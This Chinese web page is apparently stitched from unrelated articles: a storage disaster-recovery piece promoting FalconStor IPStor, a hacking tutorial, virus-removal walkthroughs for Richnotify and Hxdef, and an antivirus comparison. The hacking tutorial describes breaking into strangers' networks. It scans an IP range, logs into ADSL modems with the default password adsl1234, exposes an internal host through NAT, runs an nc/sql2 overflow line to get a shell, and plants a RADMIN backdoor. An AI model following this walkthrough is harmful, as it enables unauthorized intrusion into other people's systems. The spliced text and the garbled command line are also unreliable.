而存储系统型远程容灾的最大的限制就在于其昂贵的构建成本。由于用户必须在本地端和灾备端分別配置两套相同的存储系统，不仅采购成本高，而且还要受制于单一的设备厂商，未来的扩展性势必缺乏弹性。此外，光纤通道存储系统如果要构建远程容灾，必须在本地端和灾备端各安装一台FC-to-IP转接器，硬件成本就会超过5万美元，再加上网络带宽成本的话，整体费用投入定会令人咋舌。如果企业在安装前没有经过谨慎评估的话，构建存储系统型远程容灾极有可能造成IT支出的黑洞，加重财务负担。另外，存储系统型容灾方式对于数据库的一致性容灾存在很大的缺陷，在多点到一点的容灾架构上存在不适用性。

除了上述两种架构之外，难道企业就没有更好的选择了吗?不是的！近年，以美国飞康软件公司(FalconStor)为代表的网络存储软件解决方案提供商，成功研制出以存储网关(Storage Gateway)为核心的存储网络型(Storage Network based)远程容灾方案，这种方案不仅结合了主机型和存储系统型远程容灾架构的优点，更一举打破了远程容灾构建成本高居不下的坚冰，成为现阶段最热门的异地容灾技术。

存储网络型远程容灾架构，是在前端应用服务器与后端存储系统之间的存储区域网络(SAN)，加入一层存储网关，这个网关和我们所了解的网络网关不同，以美国飞康软件公司的方案为例，它结合了IPStor存储管理软件和专用的管理器，前端连接服务器主机，后端连接存储设备，它的角色就好像是存储网络中的交通警察，所有的I/O都交由它来控制管理。

存储网络型远程容灾：兼容并蓄

还是以飞康公司的IPStor为例，IPStor远程容灾的运行方式，是结合主机端的代理程序(Agent)和快照功能(TimeMark)，创建主机数据的快照副本，通过网络复制到远端的灾备站点。由于IPStor采用的是只对变化数据进行数据复制的模式，因此，所需的带宽较低，本地端与灾备端之间的连结则可以利用价格相对便宜的IP网络。

存储网络型远程容灾的优点可说是集前述两种架构之大成。由于数据复制是通过存储网关来执行，应用服务器只需数据库执行代理程序，相对于主机型远程容灾来说，它的性能影响十分低。另外，通过存储网关的虚拟化技术，可以整合前端异构平台的服务器和后端不同品牌的存储设备，本地端和灾备端的设备无需成对配置，用户可以根据RTO和RPO，在远端建立完整的热备份中心，当本地端发生灾难时立即接管业务运行；或是采取仅在灾备端安装存储设备的温站配置，先保护数据的完整性和安全性，在本地端修复完成后再进行恢复。

除了上述的不占用主机运行资源，以及不具备存储平台局限性特点之外，成本更是存储网络型远程容灾的最大优势。

首先，构建时不需更换原有的IT基础架构，只需在原本的存储区域网络中加入存储网关，本地端的主机和存储设备可以是任何品牌，灾备端的主机和存储设备也不需和本地端相同，用户甚至可以在灾备端采用等级较低的存储系统(如SATA磁盘阵列)，根据统计，投资成本可节省多达30%至50%！对于那些对构建远程容灾有热切需求而IT预算又十分有限的客户来说，存储网络型远程容灾无疑是最佳的选择。

其次，针对数据库专用代理，存储网络型远程容灾确保了数据库具有完整的容灾和启动能力，无需担忧无法启动的现象发生。

更为重要的是，在存储数据上进行的多点快照等增值功能，能使得各种数据的人为破坏均可以得到瞬间恢复的能力，实在是一种最为完整的容灾体系，其涵盖的灾难抗击范围远远超过前述的各类方式。在这种容灾体系中，容灾的构建已经不再是难事，灾难也不再是极为可怕的事情。

让你看黑客如何穿透ADSL路由入侵内网

作者：塞北|谷子熟了吗　来源：赛迪网安全社区

也许看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已厌烦，近来我对ADSL MODEM的路由功能产生了浓厚的兴趣，经过一番努力，我终于找到了穿透ADSL路由入侵内网的方法，在这里和各位一起分享我的心得。

一.扫描

现在很多ADSL MODEM都是通过80、23、21三个端口来管理，但80、21端口有很多服务器都有打开，没什么特征性，于是我选择了23端口。打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了。开23的主机还真不少，我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234），好了，一矢中的，现在我就是上帝。

二.映射

入侵已经成功了一半，要进一步入侵内网，我门要进行端口映射，但是我连内网的拓扑都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了（但如果使用了dhcp就麻烦了）但是192.168.1.2到底开放了什么端口，我们根本就不知道啊。呵呵，既然不知道，那么我就把他整台主机透明地映射到外网。具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192.168.1.2，到此192.168.1.2已经透明地映射到192.168.1.1上，我们访问ADSL MODEM就等于访问主机192.168.1.2了。

三.检测漏洞

现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139、1433等，刚才只是开放了80、23、21而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低啊。

四.溢出

既然没有弱口令，也没开80，那只好从逸出方面着手了，但没开80、21也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行

五.募然回首，那人却在，灯火阑珊处

看来这个管理员还是比较负责的，该打的补丁都打上了。这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？，心动不如行动，现在只好死马当活马医了，于是：

nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

这样就成功得到一个shell了。

六.设置后门

到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道。

实录如何用终截者清除Richnotify病毒

实录如何用终截者清除Richnotify病毒

作者：skyxnet　来源：赛迪网安全社区

前天，一个专职负责6家大型网吧一千多台电脑的维护工作的朋友跟我说，他所管的一家网吧的电脑感染了Richnotify病毒。Richnotify病毒竟能穿过他的冰点5.2版系统还原系统而感染网吧的所有电脑，并且清除后只要一上网又感染此病毒，搞得他焦头烂额、挫手不及，还是没搞定这些垃圾。

前不久在网上也看到过Richnotify病毒的相关文章，但没有引起注意，现听到朋友的诉说后，我便到网上查找了一些关于Richnotify病毒的资料及评论，发现最近很多网友中了此病毒后用杀毒软件还是杀不了或杀不干净，也在网上诉说他们的被Richnotify病毒骚扰后的苦衷；这时我便想到我的电脑只安装了终截者，而没有安装其它的杀毒软件或防火墙，我便心血来潮想试看我的终截者能否拦截及清除这如此可恶的病毒，于是我便叫朋友把Richnotify病毒的样本发给我，让我亲自考验一下终截者的本色（终截者要是拦不住我可惨了，自找苦吃，只好自作自受了，唉…！先不管那么多，要是真的拦不住就把终截者给休了。）。

下面就让我们一起来分享这刺激的体验吧！

我们打开终截者后运行Richnotify病毒的执行文件Richnotify.exe文件，当此执行文件试图运行时，终截者的安全预警功能便把它拦截了，阻止其运行并弹出窗口（如下图所示）提示用户，还提示危险等级是高呢！呵呵，这是终截者拦截病毒的第一关。



我们可通过点击此安全预警窗口中的“禁止”按钮来禁止Richnotify病毒的运行，在此我点击了“允许”按钮，允许了Richnotify.exe 文件的运行（因为我想试看当我不小心让此病毒的执行文件运行后，终截者还有没反应），点击“允许”后，终截者不断弹出不同的自启动防护窗口（如下图1-2），看来Richnotify.exe 运行后总是试图注入到我运行的所有exe运行程序中，并对其注册表进行修改。呵呵…！终截者还是发现了并弹出窗口提示我，这是嘻嘻，这里我还是全部点击了“允许”。



图1



图2

好了，这时我便打开procexp 进程查看工具查看我的QQ等运行程序加载了哪些程序，

我用procexp的查找功能查看有无加载Richnotify病毒的文件（如下图），哇噻…！我运行的iexplore、QQ等所有的EXE 程序都被加载了Richnotify病毒的reshtm.dll、Richnotify.exe 文件。



下面的图比较清析



上面我放过了Richnotify病毒的运行，下面我们一起再来看，通过终截者的“安全回归”功能能否禁止刚才放过的病毒。我运行了安全回归功能重启我的系统后，弹出如下图所示窗口：



在此，我得向终截者的作者们报告，终截者竟然把我的手机蓝牙设备程序误报为高风险，呵呵，兄弟们还得把签名库做全点啊！

我们再点击此窗口中的“打开编辑器”按钮看看编辑器里是如何提示的（如下图），这里显示richnotify.exe 文件的可疑程度是高风险，下次运行的状态是“未配置”。



此时，我又打开procexp 进程查看工具查看我运行的EXE程序还有没加载Richnotify病毒的文件（如下图所示），从procexp 进程查看工具窗口中查看到没有加载Richnotify病毒的任何文件了，呵呵，通过终截者的安全回归功能成功禁止了Richnotify病毒的运行。



我们再用终截者的扫描功能来扫描一遍系统，看能否帮我清除此可恶的Richnotify病毒。下面我便开始用此扫描功能扫描我的系统，下图是扫描结果的提示窗口。



下图为扫描报告的一部分



根据此扫描报告可看到那家伙在我的注册表的自启动项中添加了以下键值{9D0351F9-8E49-4ed1-BBCE-0795F5B9F240}来实现自启动。

通过此报告的提示我手动成功删除了Richnotify病毒的EXE执行文件及reshtm.dll、resPro.dll两个隐藏的病毒模块，且在注册表中删除了所有的{9D0351F9-8E49-4ed1-BBCE-0795F5B9F240} 键值。我重新启动系统并上网后，并未再发现Richnotify病毒。

成功清除了这被认为顽固的家伙。看来我的终截者还是挺管用的，以后得好好对它。

不惧黑客　用安全重启删除Hxdef后门

作者：skyxnet　来源：赛迪网安全社区

Hxdef 是一款隐藏进程、隐藏注册表、隐藏连接、隐藏文件的后门，运行以后，你用任务管理器无法看到相应的进程、注册表这些。

作者还推出了黄金版的Hxdef，这个版本据说可以躲过Iceword、Knlps、Rootkitreveal这些内核级后门检测工具。当然黄金版的是要付钱的。

但我相信，无论他怎么改，使用安全重启一定可以把他找出来。下面是我做的一个简单的介绍，教你如何使用安全重启的。

一、运行我电脑里面一个病毒样本Hxdef，然后安全专家会拦截掉他，为了描述安全重启的功能，我们在这里面允许这个进程运行。



二、点击主窗口上面的安全重启按钮

界面如下：





三、重新启动电脑完成后，

会弹出一个窗口，显示安全专家帮你拦截的进程列表，在这儿我们看到了Hxdef.exe 被拦截了。



四、你可以选择编辑列表，



网友点评　由熊猫烧香看各款杀毒软件

作者：wolf_xw　来源：赛迪网安全社区

最近熊猫烧香流行，我试了几款杀软，深有体会在这和大家分享一下，看来这个主动防御还是蛮实用的。

杀毒软件用户都会有所体会，通过病毒特征库的严格比对来判别病毒的杀毒方式总是会“慢半拍”，因此用户只得无奈的把杀软的落后杀毒方式比喻成“过期药”。近年杀毒软件厂商为解决这个问题动足了脑筋，以“主动防御”功能为主要特征的新一代防病毒体系已经成为反病毒行业技术主流。既然各主流杀软都相继推出了“主动防御”功能及相关技术，那么究竟哪一款杀软才是主动防御功能的“王中之王”呢？我们在同一测评平台下对“主动防御技术”的各项指标逐一比较。

测评软硬件环境

CPU　P4 2.6GA

内存　金士顿 512MB DDR

硬盘　WD 80GB/7200转

网络　中国电信　2MB　ADSL独享

操作系统　Windows XP Pro SP2＋IE6.0

杀毒软件“主动防御技术”之“实时监控”

现如今各种病毒和木马程序真的可谓是无孔不入，对于从不同途径可能进入到用户系统中的病毒和木马，杀毒软件能够提供的实时监控和主动拦截有害信息的项目越多，用户可能感染病毒和被植入木马程序的机率就会大大得到减少。

参评杀软：

江民：文件、邮件、网页、即时通讯软件、注册表、恶意脚本、系统监测和用户隐私信息等。

特色：注册表、隐私信息和系统监测

金山：文件、邮件、网页、ActiveX控件、即时通讯软件和用户隐私信息等。

特色：ActiveX控件、用户隐私信息

瑞星：网页、注册表、文件、邮件收发、漏洞攻击、引导区和内存等

特色：注册表、漏洞攻击、引导区和内存

诺顿2007：文件、邮件收发、网页、即时通讯软件(不包括QQ)、间谍软件入侵和可移动介质等。

特色：间谍软件、可移动介质

卡巴斯基6.0：文件、邮件收发、网页、注册表、应用程序完整性、Office和系统监测等。

特色：注册表、系统监测

点评：

各杀软通过实时监控，可以将试图“流窜”到系统中的绝大部分电脑病毒拦截于系统之外。因为“用户隐私信息”监控可以快速彻底的防止敏感信息外流，从而达到防“盗号”的目的；而“注册表”监控可以自动捕获任何一种对注册表键值的修改或读写操作，一旦发现存在试图对注册表键值的修改或读写操作，软件会立即报警并可以由用户选择决定是否接受修改或读写。

综合比较，在该项目比拼中，江民KV2007兼有包括“用户隐私信息监控”、“注册表监控”和“系统级行为监测”等在内的多项监控目标，特别是系统监测功能更是给笔者留下了深刻印象，笔者在没有升级病毒库的情况下，在虚拟机中运行了“熊猫烧香”病毒，江民系统监测迅速报警并拦截了病毒，是名副其实的“主动防御”，所以它应该是最大的赢家。另外，笔者这里还遇到了一件有趣的事，由于知道卡巴斯基也具有与江民KV2007相类似的“系统监测功能”，所以笔者也同样在装有卡巴斯基6.0的系统中分别运行虚拟机和“熊猫烧香”病毒，结果卡巴斯基果然在第一时间报警，不过报警后系统便长时间处于死机状态，第二遍实验结果依然如故，不知道是何原因。

Windows2000 下管理员账户真的不安全

无法查看这则摘要。请 点击此处查看博文。